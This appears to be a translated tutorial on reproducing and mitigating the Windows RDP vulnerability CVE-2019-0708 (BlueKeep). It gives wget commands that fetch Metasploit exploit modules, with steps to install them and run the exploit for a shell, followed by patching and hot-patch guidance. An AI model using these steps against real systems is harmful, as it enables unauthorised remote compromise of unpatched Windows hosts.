1. Vulnerability Description

On May 15, 2019, Microsoft released a security patch to fix a remote code execution vulnerability in the Windows Remote Desktop Service (RDP), tracked as CVE-2019-0708. The vulnerability can be triggered remotely without authentication, so its harm and impact are extremely large. At present, on September 7, the EXP code has been publicly released to the Pull requests of

2. Vulnerability Affected Versions

Windows 7
Windows Server 2008 R2
Windows Server 2008
Windows 2003
Windows XP

Note: Windows 8, Windows 10 and later versions are not affected by this vulnerability.

3. Vulnerability Environment Construction

Attack machine: Kali 2018.2
Target machine: win7 sp1 7061

4. Vulnerability Reproduction

  1. Update msf.

  2. Download the attack kit:

     wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
     wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
     wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
     wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

  3. Replace the corresponding files in msf:

     cve_2019_0708_bluekeep_rce.rb is added as /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
     rdp.rb replaces /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
     rdp_scanner.rb replaces /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
     cve_2019_0708_bluekeep.rb replaces /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

  4. Start msf and load the file.

  5. Search for 0708; the results show that the file has been loaded successfully.

  6. Exploit the vulnerability: set rhosts, target, and payload.

  7. Start executing the exp and successfully get the shell.

Vulnerability Prevention

  1. Download the hot patch repair tool. Download address: https://www.qianxin.com/other/CVE-2019-0708

     Note: The "CVE-2019-0708 Hot Patch Tool" is a hot patch repair tool released for the "Windows Remote Desktop Service Remote Code Execution Vulnerability CVE-2019-0708". It provides a temporary solution in environments that cannot be patched directly.

     1. Download the file and unzip it.
     2. Press Win+R, or select "Run" from the Start menu, and enter cmd to open the command line tool.
     3. In the command line tool, change to the folder where the tool is located.
     4. Enter the command for the function you need. Enable the hot patch: QKShield.exe /enable; disable the hot patch: QKShield.exe /disable.
     5. After restarting the system, you need to re-run the command to enable the hot patch.

  2. Enable hot patching.

  3. Check again whether the vulnerability is present. After the hot patch is applied, the vulnerability is no longer detected.

  4. Patching: download the vulnerability repair tool. Download address: https://www.qianxin.com/other/CVE-2019-0708

  5. Click "Repair Now" and restart your computer after the installation is complete.

  6. Use a vulnerability scanning tool to check whether the vulnerability is still present. Scanning tool download address: https://www.qianxin.com/other/CVE-2019-0708

Summary

The above covers the reproduction of the Windows CVE-2019-0708 Remote Desktop code execution vulnerability and the steps to prevent it.